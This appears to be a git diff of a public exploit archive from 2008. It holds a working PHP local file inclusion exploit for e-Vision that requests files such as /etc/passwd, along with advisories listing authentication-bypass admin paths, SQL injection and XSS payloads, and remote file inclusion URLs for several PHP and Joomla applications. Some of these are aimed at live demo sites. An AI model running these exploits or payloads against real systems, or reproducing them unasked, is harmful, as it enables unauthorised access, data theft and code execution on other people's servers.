if($mode == "save") - { - $rand = rand(0,99999); - fclose(fwrite(fopen(getcwd().'/'.$rand.'.txt',"a+"),$this->http_request($host[0],$write))); - - echo "[+] File $rand Saved Successfully!\r\n"; - echo "[+] Exploit Terminated!\r\n"; - exit; - } - else - { - echo $this->http_request($host[0],$write); - exit; - } - } - } -} - - -// StAkeR - StAkeR[at]hotmail[dot]it -// Note: if you add on msn i don't accept! -// Greetz "er biondo" - -# milw0rm.com [2008-11-07] +starting(); +$exploit->is_vulnerable($domain); +$exploit->exploiting($domain,$mymode); + + + +class Exploit +{ + function http_request($host,$data) + { + + if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP)) + { + echo "socket_create() error!\r\n"; + exit; + } + if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1)) + { + echo "socket_set_option() error!\r\n"; + exit; + } + + if(!socket_connect($socket,$host,80)) + { + echo "socket_connect() error!\r\n"; + exit; + } + if(!socket_write($socket,$data,strlen($data))) + { + echo "socket_write() errror!\r\n"; + exit; + } + + while($get = socket_read($socket,1024,PHP_NORMAL_READ)) + { + $content .= $get; + } + + socket_close($socket); + + $array = array( + 'HTTP/1.1 404 Not Found', + 'HTTP/1.1 300 Multiple Choices', + 'HTTP/1.1 301 Moved Permanently', + 'HTTP/1.1 302 Found', + 'HTTP/1.1 304 Not Modified', + 'HTTP/1.1 400 Bad Request', + 'HTTP/1.1 401 Unauthorized', + 'HTTP/1.1 402 Payment Required', + 'HTTP/1.1 403 Forbidden', + 'HTTP/1.1 405 Method Not Allowed', + 'HTTP/1.1 406 Not Acceptable', + 'HTTP/1.1 407 Proxy Authentication Required', + 'HTTP/1.1 408 Request Timeout', + 'HTTP/1.1 409 Conflict', + 'HTTP/1.1 410 Gone', + 'HTTP/1.1 411 Length Required', + 'HTTP/1.1 412 Precondition Failed', + 'HTTP/1.1 413 Request Entity Too Large', + 'HTTP/1.1 414 Request-URI Too Long', + 'HTTP/1.1 415 Unsupported Media Type', + 'HTTP/1.1 416 Request Range Not Satisfiable', + 'HTTP/1.1 417 Expectation Failed', + 'HTTP/1.1 Retry With', + ); + + 
for($i=0;$i<=count($array);$i++) + + if(eregi($array[$i],$content)) + { + return ("$array[$i]\r\n"); + break; + } + else + { + return ("$content\r\n"); + break; + } + } + + function is_vulnerable($host) + { + $host = explode('/',$host); + + $header .= "GET /$host[1]/modules/3rdparty/adminpart/add3rdparty.php?module=%27 HTTP/1.1\r\n"; + $header .= "Host: $host[0]\r\n"; + $header .= "User-Agent: athos~doesntexist\r\n"; + $header .= "Connection: close\r\n\r\n"; + + if(stristr($this->http_request($host[0],$header),"\\'")) + { + echo "[+] Magic Quotes GPC On!\n"; + echo "[+] Exploit Failed!\n"; + exit; + } + else + { + return false; + } + } + + function starting() + { + global $argv; + + if(preg_match('/http://(.+?)$/',$argv[1]) or empty($argv[1])) + { + echo "[+] e-Vision <= 2.0.2 Multiple Local File Inclusion Exploit\r\n"; + echo "[+] by athos\r\n"; + echo " -----------------------------------------------------------\r\n"; + echo "[+] Usage: php $argv[0] [host/path] [mode]\r\n"; + echo "[+] Usage: php $argv[0] [host/path] [save]\r\n"; + echo "[+] Usage: php $argv[0] [host/path] \r\n"; + exit; + } + } + + function exploiting($host,$mode) + { + $host = explode('/',$host); + $i = 0; + + + echo "[+] Local File (ex: ../../etc/passwd%00)\r\n"; + echo "[+] Local File: "; + $file = stripslashes(trim(fgets(STDIN))); + + if(empty($file)) die("you fail"); + + $array = array ( + "3rdparty/adminpart/add3rdparty.php?module=$file", + "polling/adminpart/addpolling.php?module=$file", + "contact/adminpart/addcontact.php?module=$file", + "brandnews/adminpart/addbrandnews.php?module=$file", + "newsletter/adminpart/addnewsletter.php?module=$file", + "game/adminpart/addgame.php?module=$file", + "tour/adminpart/addtour.php?module=$file", + "articles/adminpart/addarticles.php?module=$file", + "product/adminpart/addproduct.php?module=$file", + "plain/adminpart/addplain.php?module=$file", + ); + + if($i > 9) + { + $write .= "GET /$host[1]/admin/ind_ex.php HTTP/1.1\r\n"; + $write .= "Host: 
$host[0]\r\n"; + $write .= "User-Agent: doesntexist\r\n"; + $write .= "Cookie: adminlang=$file; path=/admin\r\n"; + $write .= "Connection: close\r\n\r\n"; + } + else + { + + $write .= "GET /$host[1]/modules/$array[$i] HTTP/1.1\r\n"; + $write .= "Host: $host[0]\r\n"; + $write .= "User-Agent: you are lost\r\n"; + $write .= "Connection: close\r\n\r\n"; + } + + if(stristr($this->http_request($host[0],$write),'No such file or directory in')) + { + $i++; + } + else + { + if($mode == "save") + { + $rand = rand(0,99999); + fclose(fwrite(fopen(getcwd().'/'.$rand.'.txt',"a+"),$this->http_request($host[0],$write))); + + echo "[+] File $rand Saved Successfully!\r\n"; + echo "[+] Exploit Terminated!\r\n"; + exit; + } + else + { + echo $this->http_request($host[0],$write); + exit; + } + } + } +} + + +// StAkeR - StAkeR[at]hotmail[dot]it +// Note: if you add on msn i don't accept! +// Greetz "er biondo" + +# milw0rm.com [2008-11-07] diff --git a/platforms/php/webapps/7032.txt b/platforms/php/webapps/7032.txt index 4a23bb4a9..1c6777ce6 100755 --- a/platforms/php/webapps/7032.txt +++ b/platforms/php/webapps/7032.txt 
@@ -1,62 +1,62 @@ -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\ - -============================================================================== - U&M Software Signup v1.1 Auth Bypass Vulnerability -============================================================================== - - [»] Script: [ U&M Software Signup v1.0 ] - [»] Language: [ PHP ] - [»] Website: [ http://www.hotscripts.com/Detailed/65722.html ] - [»] Type: [ Commercial ] - [»] Report-Date: [ 06.11.2008 ] - [»] Founder: [ G4N0K ] - - -===[ XPL ]=== - - [!] Use one of these paths to bypass admin login ;) - - [»] http://localhost/[path]/admin/adminstart.php - [»] http://localhost/[path]/admin/admineventtype.php - [»] http://localhost/[path]/admin/admineventdetails.php - [»] http://localhost/[path]/admin/admineventlist.php - [»] http://localhost/[path]/admin/adminuserslist.php - [»] http://localhost/[path]/admin/adminleaderslist.php - [»] http://localhost/[path]/admin/admindatabase.php - - - -===[ LIVE ]=== - - [»] http://www.signup.uochm.com/software/admin/index.php - [»] http://www.signup.uochm.com/software/admin/adminstart.php - - - -===[ Greetz ]=== - - [»] ALLAH - [»] Tornado2800 - [»] Hussain-X - - //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - //ALLAH,forgimme... 
- -=============================================================================== -exit(); //EoX -=============================================================================== - -# milw0rm.com [2008-11-07] +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\ + +============================================================================== + U&M Software Signup v1.1 Auth Bypass Vulnerability +============================================================================== + + [»] Script: [ U&M Software Signup v1.0 ] + [»] Language: [ PHP ] + [»] Website: [ http://www.hotscripts.com/Detailed/65722.html ] + [»] Type: [ Commercial ] + [»] Report-Date: [ 06.11.2008 ] + [»] Founder: [ G4N0K ] + + +===[ XPL ]=== + + [!] Use one of these paths to bypass admin login ;) + + [»] http://localhost/[path]/admin/adminstart.php + [»] http://localhost/[path]/admin/admineventtype.php + [»] http://localhost/[path]/admin/admineventdetails.php + [»] http://localhost/[path]/admin/admineventlist.php + [»] http://localhost/[path]/admin/adminuserslist.php + [»] http://localhost/[path]/admin/adminleaderslist.php + [»] http://localhost/[path]/admin/admindatabase.php + + + +===[ LIVE ]=== + + [»] http://www.signup.uochm.com/software/admin/index.php + [»] http://www.signup.uochm.com/software/admin/adminstart.php + + + +===[ Greetz ]=== + + [»] ALLAH + [»] Tornado2800 + [»] Hussain-X + + //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) + //ALLAH,forgimme... 
+ +=============================================================================== +exit(); //EoX +=============================================================================== + +# milw0rm.com [2008-11-07] diff --git a/platforms/php/webapps/7033.txt b/platforms/php/webapps/7033.txt index ecea33421..12720300d 100755 --- a/platforms/php/webapps/7033.txt +++ b/platforms/php/webapps/7033.txt 
@@ -1,61 +1,61 @@ -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\ - -============================================================================== - U&M Software JustBookIt v1.0 Auth Bypass Vulnerability -============================================================================== - - [»] Script: [ U&M Software JustBookIt v1.0 ] - [»] Language: [ PHP ] - [»] Website: [ http://www.hotscripts.com/Detailed/79959.html ] - [»] Type: [ Commercial ] - [»] Report-Date: [ 06.11.2008 ] - [»] Founder: [ G4N0K ] - - -===[ XPL ]=== - - [!] Use one of these paths to bypass admin login ;) - - [»] http://localhost/[path]/admin/user_manual.php - [»] http://localhost/[path]/admin/user_config.php - [»] http://localhost/[path]/admin/user_kundnamn.php - [»] http://localhost/[path]/admin/user_kundlista.php - [»] http://localhost/[path]/admin/user_aktiva_kunder.php - [»] http://localhost/[path]/admin/database.php - - - -===[ LIVE ]=== - - [»] http://www.justbookit.uochm.com/demo/admin/index.php - [»] http://www.justbookit.uochm.com/demo/admin/user_config.php - - - -===[ Greetz ]=== - - [»] ALLAH - [»] Tornado2800 - [»] Hussain-X - - //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - //ALLAH,forgimme... 
- -=============================================================================== -exit(); //EoX -=============================================================================== - -# milw0rm.com [2008-11-07] +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\ + +============================================================================== + U&M Software JustBookIt v1.0 Auth Bypass Vulnerability +============================================================================== + + [»] Script: [ U&M Software JustBookIt v1.0 ] + [»] Language: [ PHP ] + [»] Website: [ http://www.hotscripts.com/Detailed/79959.html ] + [»] Type: [ Commercial ] + [»] Report-Date: [ 06.11.2008 ] + [»] Founder: [ G4N0K ] + + +===[ XPL ]=== + + [!] Use one of these paths to bypass admin login ;) + + [»] http://localhost/[path]/admin/user_manual.php + [»] http://localhost/[path]/admin/user_config.php + [»] http://localhost/[path]/admin/user_kundnamn.php + [»] http://localhost/[path]/admin/user_kundlista.php + [»] http://localhost/[path]/admin/user_aktiva_kunder.php + [»] http://localhost/[path]/admin/database.php + + + +===[ LIVE ]=== + + [»] http://www.justbookit.uochm.com/demo/admin/index.php + [»] http://www.justbookit.uochm.com/demo/admin/user_config.php + + + +===[ Greetz ]=== + + [»] ALLAH + [»] Tornado2800 + [»] Hussain-X + + //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) + //ALLAH,forgimme... 
+ +=============================================================================== +exit(); //EoX +=============================================================================== + +# milw0rm.com [2008-11-07] diff --git a/platforms/php/webapps/7034.txt b/platforms/php/webapps/7034.txt index 304f9b337..e39204939 100755 --- a/platforms/php/webapps/7034.txt +++ b/platforms/php/webapps/7034.txt 
@@ -1,63 +1,63 @@ -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\ - -============================================================================== - U&M Software Event Lister v1.0 Auth Bypass Vulnerability -============================================================================== - - [»] Script: [ U&M Software Event Lister v1.0 ] - [»] Language: [ PHP ] - [»] Website: [ http://www.hotscripts.com/Detailed/84735.html ] - [»] Type: [ Commercial ] - [»] Report-Date: [ 06.11.2008 ] - [»] Founder: [ G4N0K ] - - -===[ XPL ]=== - - [!] Use one of these paths to bypass admin login ;) - - [»] http://localhost/[path]/admin/start.php - [»] http://localhost/[path]/admin/aktivitet.php - [»] http://localhost/[path]/admin/prop_aktivitet.php - [»] http://localhost/[path]/admin/kategorier.php - [»] http://localhost/[path]/admin/konfig.php - [»] http://localhost/[path]/admin/security.php - [»] http://localhost/[path]/admin/manual.php - - - - -===[ LIVE ]=== - - [»] http://www.justlistit.uochm.com/demo/admin/start.php - [»] http://www.justlistit.uochm.com/demo/admin/index.php - - - -===[ Greetz ]=== - - [»] ALLAH - [»] Tornado2800 - [»] Hussain-X - - //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - //ALLAH,forgimme... 
- -=============================================================================== -exit(); //EoX -=============================================================================== - -# milw0rm.com [2008-11-07] +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\ + +============================================================================== + U&M Software Event Lister v1.0 Auth Bypass Vulnerability +============================================================================== + + [»] Script: [ U&M Software Event Lister v1.0 ] + [»] Language: [ PHP ] + [»] Website: [ http://www.hotscripts.com/Detailed/84735.html ] + [»] Type: [ Commercial ] + [»] Report-Date: [ 06.11.2008 ] + [»] Founder: [ G4N0K ] + + +===[ XPL ]=== + + [!] Use one of these paths to bypass admin login ;) + + [»] http://localhost/[path]/admin/start.php + [»] http://localhost/[path]/admin/aktivitet.php + [»] http://localhost/[path]/admin/prop_aktivitet.php + [»] http://localhost/[path]/admin/kategorier.php + [»] http://localhost/[path]/admin/konfig.php + [»] http://localhost/[path]/admin/security.php + [»] http://localhost/[path]/admin/manual.php + + + + +===[ LIVE ]=== + + [»] http://www.justlistit.uochm.com/demo/admin/start.php + [»] http://www.justlistit.uochm.com/demo/admin/index.php + + + +===[ Greetz ]=== + + [»] ALLAH + [»] Tornado2800 + [»] Hussain-X + + //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) + //ALLAH,forgimme... 
+ +=============================================================================== +exit(); //EoX +=============================================================================== + +# milw0rm.com [2008-11-07] diff --git a/platforms/php/webapps/7035.txt b/platforms/php/webapps/7035.txt index eb1b91634..fea55b012 100755 --- a/platforms/php/webapps/7035.txt +++ b/platforms/php/webapps/7035.txt @@ -1,37 +1,37 @@ -################################################################## -# -# Author: TR-ShaRk -# -###################### -# -# Web : StarHack.Us OldKral.Com -# -###################### -# -# Emai : Admin@tr-shark.org -# -###################### -# -# Script : Local Classifieds Turnkeyforms -# -###################### -# -# SQL Injection Vuln. : -# -# listtest.php?r=-39+union+select+1,@@version-- -# -# Xss: -# -# listtest.php?r="> -# -###################### -# -# Demo: -# -# -# http://demo.turnkeyforms.com/localclassifieds/listtest.php?r="> -# http://demo.turnkeyforms.com/localclassifieds/listtest.php?r=-39+union+select+1,@@version-- -# -###################### - -# milw0rm.com [2008-11-07] +################################################################## +# +# Author: TR-ShaRk +# +###################### +# +# Web : StarHack.Us OldKral.Com +# +###################### +# +# Emai : Admin@tr-shark.org +# +###################### +# +# Script : Local Classifieds Turnkeyforms +# +###################### +# +# SQL Injection Vuln. : +# +# listtest.php?r=-39+union+select+1,@@version-- +# +# Xss: +# +# listtest.php?r="> +# +###################### +# +# Demo: +# +# +# http://demo.turnkeyforms.com/localclassifieds/listtest.php?r="> +# http://demo.turnkeyforms.com/localclassifieds/listtest.php?r=-39+union+select+1,@@version-- +# +###################### + +# milw0rm.com [2008-11-07] diff --git a/platforms/php/webapps/7038.txt b/platforms/php/webapps/7038.txt index 72696955b..243fa117a 100755 --- a/platforms/php/webapps/7038.txt +++ b/platforms/php/webapps/7038.txt 
@@ -1,73 +1,73 @@ -========================================================================================================================================================= - - - [o] Clickheat - Heatmap stats for Joomla! 1.0.1 Multiple Remote File Inclusion Vulnerabilities - - Software : com_clickheat version 1.0.1 - Vendor : http://www.recly.com/ - Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=1 - Author : NoGe - Contact : noge[dot]code[at]gmail[dot]com - Blog : http://evilc0de.blogspot.com - - -========================================================================================================================================================= - - - [o] Vulnerable file - - administrator/components/com_clickheat/install.clickheat.php - - require_once($GLOBALS['mosConfig_absolute_path']. '/administrator/components/com_clickheat/Recly_Config.php'); - - administrator/components/com_clickheat/includes/heatmap/_main.php - - require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' ); - - administrator/components/com_clickheat/includes/heatmap/main.php - - require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' ); - - administrator/components/com_clickheat/includes/overview/main.php - - require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Overview.php' ); - - administrator/components/com_clickheat/Recly/Clickheat/Cache.php - - require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php'); - - administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php - - require_once( $GLOBALS['mosConfig_absolute_path'] . 
'/components/Recly/common/Logger.php'); - - administrator/components/com_clickheat/Recly/common/GlobalVariables.php - - require_once($GLOBALS['mosConfig_absolute_path'].'/components/Recly/common/String.php'); - - - - [o] Exploit - - http://localhost/[path]/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=[evilcode] - http://localhost/[path]/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=[evilcode] - http://localhost/[path]/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=[evilcode] - http://localhost/[path]/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=[evilcode] - http://localhost/[path]/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=[evilcode] - http://localhost/[path]/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=[evilcode] - http://localhost/[path]/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=[evilcode] - - -========================================================================================================================================================= - - - [o] Greetz - - MainHack BrotherHood [ http://serverisdown.org/blog/] - Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa - H312Y yooogy mousekill }^-^{ kaka11 martfella - skulmatic olibekas ulga Cungkee k1tk4t str0ke - - -========================================================================================================================================================= - -# milw0rm.com [2008-11-07] +========================================================================================================================================================= + + + [o] Clickheat - Heatmap stats for Joomla! 
1.0.1 Multiple Remote File Inclusion Vulnerabilities + + Software : com_clickheat version 1.0.1 + Vendor : http://www.recly.com/ + Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=1 + Author : NoGe + Contact : noge[dot]code[at]gmail[dot]com + Blog : http://evilc0de.blogspot.com + + +========================================================================================================================================================= + + + [o] Vulnerable file + + administrator/components/com_clickheat/install.clickheat.php + + require_once($GLOBALS['mosConfig_absolute_path']. '/administrator/components/com_clickheat/Recly_Config.php'); + + administrator/components/com_clickheat/includes/heatmap/_main.php + + require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' ); + + administrator/components/com_clickheat/includes/heatmap/main.php + + require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' ); + + administrator/components/com_clickheat/includes/overview/main.php + + require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Overview.php' ); + + administrator/components/com_clickheat/Recly/Clickheat/Cache.php + + require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php'); + + administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php + + require_once( $GLOBALS['mosConfig_absolute_path'] . 
'/components/Recly/common/Logger.php'); + + administrator/components/com_clickheat/Recly/common/GlobalVariables.php + + require_once($GLOBALS['mosConfig_absolute_path'].'/components/Recly/common/String.php'); + + + + [o] Exploit + + http://localhost/[path]/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=[evilcode] + http://localhost/[path]/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=[evilcode] + http://localhost/[path]/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=[evilcode] + http://localhost/[path]/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=[evilcode] + http://localhost/[path]/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=[evilcode] + http://localhost/[path]/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=[evilcode] + http://localhost/[path]/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=[evilcode] + + +========================================================================================================================================================= + + + [o] Greetz + + MainHack BrotherHood [ http://serverisdown.org/blog/] + Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa + H312Y yooogy mousekill }^-^{ kaka11 martfella + skulmatic olibekas ulga Cungkee k1tk4t str0ke + + +========================================================================================================================================================= + +# milw0rm.com [2008-11-07] diff --git a/platforms/php/webapps/7039.txt b/platforms/php/webapps/7039.txt index cad5f766f..e73b274c3 100755 --- a/platforms/php/webapps/7039.txt +++ b/platforms/php/webapps/7039.txt 
@@ -1,53 +1,53 @@ -============================================================================================================================================================= - - - [o] Recly!Competitions Component 1.0.0 Multiple Remote File Inclusion Vulnerability - - Software : com_competitions version 1.0.0 - Vendor : http://www.recly.com/ - Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=12 - Author : NoGe - Contact : noge[dot]code[at]gmail[dot]com - Blog : http://evilc0de.blogspot.com - - -============================================================================================================================================================= - - - [o] Vulnerable file - - administrator/components/com_competitions/includes/competitions/add.php - - require_once($GLOBALS['mosConfig_absolute_path'] . '/components/com_competitions/lib/common/GlobalVariables.class.php'); - - administrator/components/com_competitions/includes/competitions/competitions.php - - require_once( $GLOBALS['mosConfig_absolute_path'] . 
'/administrator/includes/pageNavigation.php' ); - - administrator/components/com_competitions/includes/settings/settings.php - - require_once($mosConfig_absolute_path.'/components/com_competitions/lib/common/String.class.php'); - - - - [o] Exploit - - http://localhost/[path]/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=[evilcode] - http://localhost/[path]/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=[evilcode] - http://localhost/[path]/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=[evilcode] - - -============================================================================================================================================================= - - - [o] Greetz - - MainHack BrotherHood [ http://serverisdown.org/blog/] - Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa - H312Y yooogy mousekill }^-^{ kaka11 martfella - skulmatic olibekas ulga Cungkee k1tk4t str0ke - - -============================================================================================================================================================= - -# milw0rm.com [2008-11-07] +============================================================================================================================================================= + + + [o] Recly!Competitions Component 1.0.0 Multiple Remote File Inclusion Vulnerability + + Software : com_competitions version 1.0.0 + Vendor : http://www.recly.com/ + Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=12 + Author : NoGe + Contact : noge[dot]code[at]gmail[dot]com + Blog : http://evilc0de.blogspot.com + + +============================================================================================================================================================= + + + [o] Vulnerable file + + 
administrator/components/com_competitions/includes/competitions/add.php + + require_once($GLOBALS['mosConfig_absolute_path'] . '/components/com_competitions/lib/common/GlobalVariables.class.php'); + + administrator/components/com_competitions/includes/competitions/competitions.php + + require_once( $GLOBALS['mosConfig_absolute_path'] . '/administrator/includes/pageNavigation.php' ); + + administrator/components/com_competitions/includes/settings/settings.php + + require_once($mosConfig_absolute_path.'/components/com_competitions/lib/common/String.class.php'); + + + + [o] Exploit + + http://localhost/[path]/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=[evilcode] + http://localhost/[path]/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=[evilcode] + http://localhost/[path]/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=[evilcode] + + +============================================================================================================================================================= + + + [o] Greetz + + MainHack BrotherHood [ http://serverisdown.org/blog/] + Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa + H312Y yooogy mousekill }^-^{ kaka11 martfella + skulmatic olibekas ulga Cungkee k1tk4t str0ke + + +============================================================================================================================================================= + +# milw0rm.com [2008-11-07] diff --git a/platforms/php/webapps/7040.txt b/platforms/php/webapps/7040.txt index dd1bf8153..9a21d2bbb 100755 --- a/platforms/php/webapps/7040.txt +++ b/platforms/php/webapps/7040.txt 
@@ -1,58 +1,58 @@ -=================================================================================================================================================== - - - [o] Feederator - RSS manager Component 1.0.5 Multiple Remote File Inclusion Vulnerabilities - - Software : com_feederator version 1.0.5 - Vendor : http://www.recly.com/ - Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=2 - Author : NoGe - Contact : noge[dot]code[at]gmail[dot]com - Blog : http://evilc0de.blogspot.com - - -=================================================================================================================================================== - - - [o] Vulnerable file - - administrator/components/com_feederator/includes/tmsp/add_tmsp.php - - require_once( $mosConfig_absolute_path . '/components/Recly/Recly_TMSP/Recly_TMSP.class.php' ); - - administrator/components/com_feederator/includes/tmsp/edit_tmsp.php - - require_once( $mosConfig_absolute_path . '/components/Recly/Recly_TMSP/Recly_TMSP.class.php' ); - - administrator/components/com_feederator/includes/tmsp/subscription.php - - require_once($GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/GlobalVariables.class.php'); - - administrator/components/com_feederator/includes/tmsp/tmsp.php - - require_once( $mosConfig_absolute_path . 
'/components/Recly/Recly_HTML/Recly_Paginator.class.php' ); - - - - [o] Exploit - - http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=[evilcode] - http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=[evilcode] - http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=[evilcode] - http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=[evilcode] - - -=================================================================================================================================================== - - - [o] Greetz - - MainHack BrotherHood [ http://serverisdown.org/blog/] - Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa - H312Y yooogy mousekill }^-^{ kaka11 martfella - skulmatic olibekas ulga Cungkee k1tk4t str0ke - - -=================================================================================================================================================== - -# milw0rm.com [2008-11-07] +=================================================================================================================================================== + + + [o] Feederator - RSS manager Component 1.0.5 Multiple Remote File Inclusion Vulnerabilities + + Software : com_feederator version 1.0.5 + Vendor : http://www.recly.com/ + Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=2 + Author : NoGe + Contact : noge[dot]code[at]gmail[dot]com + Blog : http://evilc0de.blogspot.com + + +=================================================================================================================================================== + + + [o] Vulnerable file + + administrator/components/com_feederator/includes/tmsp/add_tmsp.php + + require_once( $mosConfig_absolute_path . 
'/components/Recly/Recly_TMSP/Recly_TMSP.class.php' ); + + administrator/components/com_feederator/includes/tmsp/edit_tmsp.php + + require_once( $mosConfig_absolute_path . '/components/Recly/Recly_TMSP/Recly_TMSP.class.php' ); + + administrator/components/com_feederator/includes/tmsp/subscription.php + + require_once($GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/GlobalVariables.class.php'); + + administrator/components/com_feederator/includes/tmsp/tmsp.php + + require_once( $mosConfig_absolute_path . '/components/Recly/Recly_HTML/Recly_Paginator.class.php' ); + + + + [o] Exploit + + http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=[evilcode] + http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=[evilcode] + http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=[evilcode] + http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=[evilcode] + + +=================================================================================================================================================== + + + [o] Greetz + + MainHack BrotherHood [ http://serverisdown.org/blog/] + Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa + H312Y yooogy mousekill }^-^{ kaka11 martfella + skulmatic olibekas ulga Cungkee k1tk4t str0ke + + +=================================================================================================================================================== + +# milw0rm.com 